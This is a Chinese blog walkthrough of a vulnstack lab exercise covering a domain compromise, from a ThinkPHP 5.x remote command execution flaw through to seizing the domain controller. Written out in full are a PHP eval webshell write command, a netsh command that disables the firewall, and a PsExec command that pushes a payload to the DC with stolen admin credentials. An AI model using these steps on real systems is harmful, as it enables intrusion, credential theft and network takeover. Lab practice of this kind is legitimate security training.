单机域渗透练习

简介: 单机域渗透练习

环 境

Win7 +phpstudy+thinkphp(5.0.22) 双网卡

ip  192.168.5.139       桥接模式

ip  192.168.138.136   仅主机模式

Win2008                  仅主机模式

ip 192.168.5.139

下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

首先访问url

http://192.168.5.139/

Goby扫描 发现tp5.x 远程命令执行

查看目录后 写入一句话


echo "<?php @eval($_POST['123']);?>" >C://phpStudy//PHPTutorial//WWW//public//shell.php


菜刀连接

查看存活主机


查看详细ip地址  ipconfig  /all  可以看到域  (忘了截图)

查找域ip  ping sun.com

查看域内用户

640.png

提权system 查看进程无杀毒软件

CS制作木马 一直连不上

发现防火墙没有关闭 直接关闭

netsh firewall set opmode disable

获取域用户密码

提权SYSTEM

内网可以用psexec登录的主机,基于ipc共享,要打开445端口才可以,所以扫一下445端口

Win7  双网卡 dc 内网 这个时候就让dc主动链接cs 可以通过win7 中转会话

win7  进入中专 建立监听 监听地址6666

再次生成木马 选择刚才的监听 6666

把木马和工具上传到win7

640.png

刚才我们看到了域内有三个用户 这里的用户就是域内用户 密码在上面已经抓取出来了

shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138-u sun\Administrator -p admin@123 -d -c C:\phpStudy\PHPTutorial\WWW\public\dc.exe

抓取密码 可以看到dc的密码了域控也就到手了

相关文章
|
安全 Java 关系型数据库
域渗透之外网打点到三层内网(二)
域渗透之外网打点到三层内网
213 0
域渗透之外网打点到三层内网(二)
|
存储 SQL 网络协议
内网渗透|初识域基础及搭建简单域
内网渗透|初识域基础及搭建简单域
277 0
|
SQL 安全 网络协议
域渗透之外网打点到三层内网(三)
域渗透之外网打点到三层内网
279 0
域渗透之外网打点到三层内网(三)
|
SQL 安全 网络安全
域渗透之外网打点到三层内网(一)
域渗透之外网打点到三层内网
165 0
域渗透之外网打点到三层内网(一)
|
监控 开发者 Scala
对本地机器进行监控的解决方案 | 学习笔记
快速学习对本地机器进行监控的解决方案
对本地机器进行监控的解决方案 | 学习笔记
|
云安全 分布式计算 资源调度
TeamTNT变种攻击Hadoop集群,云上服务对外开放需谨慎
近日,阿里云安全监测到TeamTNT变种,除了沿用之前攻击手法,最新利用了Hadoop Yarn未授权访问漏洞进行传播,同时使用多个域名和IP确保恶意文件落地,对脚本进行二进制化封装以对抗主机端检测。
567 0
TeamTNT变种攻击Hadoop集群,云上服务对外开放需谨慎
|
监控 网络协议 Linux
NAT环境无法访问云端的深层次分析
这是一次我维护runningdoctor时候遇到的问题现象:1.用户无法打开web.runningdoctor.cn 2.监控状态无异常、无报警 3.tracert结果无异常、丢包率正常 4.用户无法访问的时候,我们能打开网站 5.
5896 0
|
关系型数据库 Oracle 数据库
公司域服务器瘫痪后pdm服务器的恢复过程
我所在的公司的产品是工业级的工具(产品的复杂度来说,比电钻复杂很多,比汽车简单),生产模式属于按单生产,采用SAP和PDM作为公司运行的两个主要平台。上周六公司内网的域服务器瘫痪,准确的说是辅助域控制器瘫痪,因为主域控制器早在多年前就瘫痪了。
1504 0
下一篇
无影云桌面